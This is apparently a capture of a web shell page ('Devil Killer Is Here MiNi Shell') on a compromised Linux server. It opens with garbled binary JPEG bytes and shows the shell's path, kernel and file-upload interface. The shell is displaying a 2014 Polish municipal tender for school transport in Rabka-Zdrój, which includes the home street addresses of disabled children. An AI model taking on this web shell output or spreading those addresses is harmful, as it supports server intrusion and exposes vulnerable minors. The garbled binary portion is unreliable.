JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140804/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140804/168407-N-2014.html

<p class="kh_header"><b>Rabka-Zdrój: Dowóz uczniów do Gimnazjum nr 1 w Rabce-Zdrój, do Zespołu Szkoły Podstawowej i Gimnazjum w Rdzawce oraz osób niepełnosprawnych w roku szkolnym 2014-2015</b><br>
<b>Numer ogłoszenia: 168407 - 2014; data zamieszczenia: 04.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Rabce-Zdroju , ul. Parkowa 2, 34-700 Rabka-Zdrój, woj. małopolskie, tel. 18 2676440, 2677178.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rabka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowóz uczniów do Gimnazjum nr 1 w Rabce-Zdrój, do Zespołu Szkoły Podstawowej i Gimnazjum w Rdzawce oraz osób niepełnosprawnych w roku szkolnym 2014-2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dowóz i odwóz uczniów Gimnazjum nr 1 w Rabce Zdrój, oraz uczniów Zespołu Szkoły Podstawowej i Gimnazjum w Rdzawce w roku szkolnym 2014 - 2015.
Zamówienie podzielone jest na III części.
1.1. Część I: 
Dowóz i odwóz uczniów Gimnazjum nr 1 w Rabce Zdrój w roku szkolnym 2014-2015
Zakres części I obejmuje:
- codzienny przywóz oraz odwóz uczniów według ustalonego harmonogramu z ul. Zaryte na ul. Jana Pawła II,
Trasa dla Części I:
- Gimnazjum nr 1 w Rabce - Zdrój: 
przystanek początkowy: parking obok Szkoły Podstawowej nr 4 ul. Zaryte, przystanek końcowy: parking przy ul. Jana Pawła II i powrót: Ilość uczniów: 31

Przywozy godz. 7.35 (przystanek początkowy), odwozy godz. 14.30 (odjazd z parkingu szkolnego).

1.2. Część II: 
Dowóz i odwóz uczniów Zespołu Szkoły Podstawowej i Gimnazjum 
w Rdzawce w roku szkolnym 2014-2015
Zakres części II obejmuje:
- codzienny przewóz uczniów według ustalonego harmonogramu z miejscowości Zespołu Szkoły Podstawowej i Gimnazjum w Rdzawce.

Trasa dla Części II:
- Zespół Szkoły Podstawowej i Gimnazjum w Rdzawce: 
przystanek początkowy: przystanek PKS przy zakopiance Rdzawka 2 przy drodze krajowej nr 47         
przystanek końcowy: parking przy Zespole Szkoły Podstawowej i Gimnazjum w Rdzawce
i powrót: Ilość uczniów: 10

Przywozy godz. 7.20 (przystanek początkowy), odwozy godz. 14.20 (odjazd z parkingu szkolnego).

PRZEJAZD DROGĄ KRAJOWĄ NR 47 PRZEZ CHABÓWKĘ, RABKĘ-ZDRÓJ

1.3. Część III:
Dowóz uczniów niepełnosprawnych wraz z opieką do placówek oświatowych w roku szkolnym 2014/2015.

Zakres części III obejmuje:

- dowóz 1 dziecka niepełnosprawnego do przedszkola specjalnego przy Specjalnym Ośrodku Szkolno - Wychowawczym Nr 1 (SOSW Nr 1) w Nowym Targu, ul. Jana Pawła II 85 oraz dowóz 2 uczniów niepełnosprawnych do szkoły przy Ośrodku Rehabilitacyjno - Edukacyjno - Wychowawczym (OREW) w Nowym Targu, ul. Podtatrzańska 47 a.

a)	dowóz dziecka niepełnosprawnego do przedszkola specjalnego wraz z opiekunem (opiekę sprawować będzie ojciec dziecka) będzie odbywał się 2 razy w tygodniu, 
tj.:
- w poniedziałki: odbiór dziecka i opiekuna z domu (ul. Wójtowiczowa 23), dowóz do Przedszkola SOSW Nr 1 w Nowym Targu, ul. Jana Pawła II 85 oraz powrót opiekuna do domu; 
- w piątki: przejazd wraz z opiekunem z domu (ul. Wójtowiczowa 23), do Przedszkola Specjalnego przy SOSW Nr 1, odbiór dziecka z Przedszkola oraz dowóz dziecka i opiekuna do domu (ul. Wójtowiczowa 23);
b) dowóz uczniów niepełnosprawnych z ich miejsca zamieszkania:
- ul. Cicha 3 do Publicznego Gimnazjum przy SOSW Nr 1 w Nowym Targu będzie odbywał się od poniedziałku do piątku, 
- ul. Słoneczna 54 do szkoły przy Ośrodku Rehabilitacyjno - Edukacyjno - Wychowawczym (OREW) w Nowym Targu, ul. Podtatrzańska 47 a od poniedziałku do czwartku. 

Inne postanowienia dotyczące części III:
a)	Przewozy uczniów mogą się odbywać wyłącznie środkami transportu spełniającymi wymagania techniczne określone w przepisach ustawy z dnia 20 czerwca 1997 r. - Prawo o ruchu drogowym (t. j. Dz. U. z 2012 r. poz. 1137, z późn. zm.) i innych przepisach związanych z przewozem osób, m.in. ustawy z dnia 06 września 2001 r. o transporcie drogowym (t. j. Dz. U. z 2013 r. poz. 1414).
b)	Wykonawca będzie zobowiązany zapewnić uczniom bezpieczny przewóz, tzn. odpowiednie warunki bezpieczeństwa i higieny. Pojazd powinien być przystosowany do przewozu uczniów niepełnosprawnych, wyposażony w pasy bezpieczeństwa. Ponadto, musi posiadać wystarczającą liczbę miejsc siedzących. Wykonawca ubezpiecza pojazd i pasażerów od wszelkich szkód powstałych podczas przewozu i pozostających w związku z przewozem. 
c)	W przypadku awarii pojazdu Wykonawca zapewnia inny pojazd do prawidłowej realizacji usługi.
d)	Opiekę nad uczniami niepełnosprawnymi w czasie przewozów organizuje i zapewnia Wykonawca (nie może nim być kierowca) - nie dotyczy dziecka gdzie ojciec zapewnia opiekę podczas przejazdu. 
e)	Opieka musi być sprawowana przez osobę pełnoletnią i posiadającą zdolność do czynności prawnych. Dodatkowo osoba ta musi posiadać przygotowanie pedagogiczne lub uprawnienia kierownika wycieczek, jak również powinna posiadać doświadczenie w zakresie sprawowania opieki nad osobami niepełnosprawnymi w ciągu ostatnich 12 miesięcy.
f)	Osoba pełniąca funkcję opiekuna będzie zobowiązana w szczególności do: zapewnienia bezpieczeństwa w trakcie przewozu uczniów do szkół, zapewnienia bezpiecznego wsiadania do pojazdu oraz wysiadania z pojazdu uczniów niepełnosprawnych, doprowadzania z pojazdu do szkoły każdego z uczniów i przekazanie ich nauczycielowi, przyprowadzania ze szkoły do pojazdu każdego z uczniów i po dowiezieniu do domu przekazywania ich pod opiekę rodziców (prawnych opiekunów). 

Trasa przejazdu:

Z: Rabka-Zdrój: ul. Wójtowiczowa 23, ul. Słoneczna 54, ul. Cicha 3;	
Do: Nowy Targ: Ośrodek Rehabilitacyjno-Edukacyjno-Wychowawczy, ul. Podtatrzańska 47 a, Przedszkole Specjalne i Publiczne Gimnazjum przy Specjalnym
                       Ośrodku Szkolno-Wychowawczym Nr 1, ul. Jana Pawła II 85;
oraz 
Z: Nowy Targ; Ośrodek Rehabilitacyjno-Edukacyjno-Wychowawczy, ul. Podtatrzańska 
                        47 a, Przedszkole Specjalne i Publiczne Gimnazjum przy Specjalnym  
                        Ośrodku Szkolno-Wychowawczym Nr 1, ul. Jana Pawła II 85;
Do: Rabka-Zdrój; ul. Cicha 3, ul. Słoneczna 54, ul. Wójtowiczowa 23.4.

Ilość osób na trasie przejazdu: 
- w poniedziałki - 5 (dziecko niepełnosprawne + ojciec dziecka oraz dwóch uczniów niepełnosprawnych + opiekun zapewniający opiekę podczas dowozu);
- wtorki, środy, czwartki - 3 (dwóch uczniów niepełnosprawnych + opiekun zapewniający opiekę podczas dowozu);
- piątki - 4 (dziecko niepełnosprawne + ojciec dziecka oraz jeden uczeń niepełnosprawny + opiekun zapewniający opiekę podczas dowozu).

Termin wykonania zamówienia:
Rok szkolny 2014/2015,  tj. od 01 września 2014 r. do 21 grudnia 2014 r. oraz od 02 stycznia 2015 r. do 26 czerwca 2015 r., w dni nauki szkolnej, z wyłączeniem ferii i innych dni wolnych od zajęć szkolnych.

Maksymalna ilość dni w roku szkolnym 2014/2015:
- wrzesień - 22,
- październik - 23,
- listopad - 19, 
- grudzień - 15,
- styczeń - 20,
- luty - 10,
- marzec - 22,
- kwiecień - 18,
- maj - 20,
- czerwiec - 19.

Godziny wykonania zadania:
- dowóz na godz. 8.00 do Nowego Targu,
- odbiór nie później niż godz. 15.00 z Nowego Targu.

Szczegółowy plan dowozów będzie dostosowany do planu zajęć uczniów. Codzienna trasa może ulec zmianie w przypadku zgłoszonej nieobecności uczniów.

3.2. Inne postanowienia:
a) Zamawiający dopuszcza składanie ofert częściowych. 
b) Zamawiający nie dopuszcza ofert wariantowych.
c) Przedmiotem niniejszego postępowania nie jest zawarcie umowy ramowej.
d) Zamawiający nie przewiduje przeprowadzania aukcji elektronicznej. 
e) Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu. 

Jeżeli Wykonawca zamierza powierzyć określoną część prac podwykonawcom zobowiązany jest wskazać w ofercie zakres tych prac zgodnie z załącznikiem do SIWZ.

3.3 Obowiązki Wykonawcy:
a) Wykonawca przed podpisaniem umowy zobowiązany jest do posiadania 
aktualnego zezwolenia na wykonywanie regularnych specjalnych przewozów osób 
w krajowym transporcie drogowym na trasach objętych niniejszym postępowaniem, oraz dla Części III posiadani dokumentu stwierdzającego wymagane kwalifikacje do sprawowania opieki nad uczniami niepełnosprawnymi, tzn.: przygotowanie pedagogiczne lub uprawnienia kierownika wycieczek, jak również powinna posiadać doświadczenie w zakresie sprawowania opieki nad osobami niepełnosprawnymi w ciągu ostatnich 12 miesięcy.
b) Wykonawca musi zapewnić uczniom opiekę podczas wsiadania i wysiadania, opiekę podczas podróży, odpowiednie warunki bezpieczeństwa, higieny, wygody oraz właściwą obsługę, a także punktualność, dla Części III osoba pełniąca funkcję opiekuna będzie zobowiązana w szczególności do: zapewnienia bezpieczeństwa w trakcie przewozu uczniów do szkół, zapewnienia bezpiecznego wsiadania do pojazdu oraz wysiadania z pojazdu uczniów niepełnosprawnych, doprowadzania z pojazdu do szkoły każdego z uczniów i przekazanie ich nauczycielowi, przyprowadzania ze szkoły do pojazdu każdego z uczniów i po dowiezieniu do domu przekazywania ich pod opiekę rodziców (prawnych opiekunów). 
c) Wykonawca zobowiązany jest do uzyskania zgód zarządcy terenów (przystanków) na zatrzymywanie się w miejscach wskazanych przez Zamawiającego.
d) W razie uszkodzenia pojazdu wykonującego przewóz uczniów, Wykonawca zobowiązany jest do podstawienia pojazdu zastępczego.
e) W przypadku choroby lub innego zdarzenia losowego kierowcy przewidzianego do przewozu dzieci, Wykonawca musi zapewnić kierowcę zastępczego.
f) Pojazdy do przewozu dzieci muszą posiadać ważne ubezpieczenie w zakresie OC 
i NW.
g) Wszystkie pojazdy, które będą wykorzystane do realizacji dowozów winny spełniać wymogi określone w Rozporządzeniu Ministrów Infrastruktury z dnia 31 grudnia 2002 roku w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz. U. 2003 nr 32, poz. 262 z późn. zm.) 
h)  Zamawiający wymaga przestrzegania zakazu palenia tytoniu w pojeździe.
9. W związku z tym, że wykonywane przewozy odbywają się w formie komunikacji zamkniętej przewóz młodzieży odbywać się będzie na podstawie list imiennych posiadanych przez opiekuna.
10. Zaleca się, aby wykonawca dokonał wizji lokalnej na terenie gminy Rabka-Zdrój oraz zdobył wszelkie informacje, które mogą być przydatne do przygotowania oferty i podpisania umowy.

3.4. Zamawiający zastrzega możliwość zmiany godzin dowozu i odwozu ze względu na zmianę organizacji pracy szkoły lub dla części III w przypadku zgłoszenia nieobecności uczniów.

3.5. Przed podpisaniem umowy Wykonawca zobowiązany jest do dostarczenia Zamawiającemu:
a) aktualną licencję na wykonywanie krajowego transportu drogowego osób zgodnie z obowiązującymi przepisami prawa.
b) aktualny dokument stwierdzający wymagane kwalifikacje do sprawowania opieki nad uczniami niepełnosprawnymi, tzn.: przygotowanie pedagogiczne lub uprawnienia kierownika wycieczek dla Części III..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 26.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek jeżeli złoży oświadczenie wg wzoru do niniejszej specyfikacji istotnych warunków zamówienia.
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek jeżeli wykaże realizację w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
- co najmniej 3 usługi odpowiadające swoim rodzajem stanowiącym przedmiot zamówienia, tj. dowozie uczniów do szkół w ciągu roku szkolnego (również wykonywane) - dla części I i części II;
- co najmniej 1 usługę polegającą na dowozie uczniów niepełnosprawnych do szkół, przedszkoli lub ośrodków rehabilitacyjnych w ciągu roku szkolnego - dla części III.
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania odpowiednim potencjałem technicznym. 
3) warunku dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
a)	wymagane jest wykazanie przez Wykonawcę możliwość dysponowania, w celu wykonania zamówienia: 
- dla Części I: co najmniej 1 odpowiednim pojazdem (posiadającym min.: aktualne badania techniczne, miejsca siedzące z zagłówkami, skierowane w kierunku jazdy, pojazdy muszą być wyposażone w opony zachowujące dobre właściwości jezdne nawet na ośnieżonej nawierzchni, a rok produkcji pojazdów nie może być starszy niż 2004 r.) z liczbą miejsc nie mniejszą: 
niż 33 osoby,
 - dla Części II: co najmniej 1 odpowiednim pojazdem (posiadającym min.: aktualne badania techniczne, miejsca siedzące z zagłówkami, skierowane w kierunku jazdy, pojazdy muszą być wyposażone w opony zachowujące dobre właściwości jezdne nawet na ośnieżonej nawierzchni, a rok produkcji pojazdów nie może być starszy niż 2004 r.) z liczbą miejsc nie mniejszą: 
niż 12 osób,
- dla Części III: co najmniej 1 odpowiednim pojazdem (posiadającym min.: aktualne badania techniczne, miejsca siedzące z zagłówkami, skierowane w kierunku jazdy, pojazdy muszą być wyposażone w opony zachowujące dobre właściwości jezdne nawet na ośnieżonej nawierzchni, a rok produkcji pojazdów nie może być starszy niż 2004 r.) z liczbą miejsc nie mniejszą: 
niż 5 osób,

W celu potwierdzenia spełnienia warunku dotyczącego dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia do ofert należy dołączyć wykaz niezbędnych do wykonania zamówienia pojazdów, jakimi dysponuje wykonawca, zawierający informacje na temat: typu pojazdu, roku produkcji, ilości miejsc, terminu ważności badań technicznych pojazdu - zgodnie z wzorami, które stanowią załączniki do niniejszej SIWZ.

Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Należy złożyć oświadczenia wg wzoru stanowiącego załączniki do niniejszej specyfikacji istotnych warunków zamówienia oraz oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek jeżeli wykaże opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej 
z przedmiotem zamówienia.
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>- co najmniej 3 usługi odpowiadające swoim rodzajem stanowiącym przedmiot zamówienia, tj. dowozie uczniów do szkół w ciągu roku szkolnego (również wykonywane) - dla części I i części II;
- co najmniej 1 usługę polegającą na dowozie uczniów niepełnosprawnych do szkół, przedszkoli lub ośrodków rehabilitacyjnych w ciągu roku szkolnego - dla części III.;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

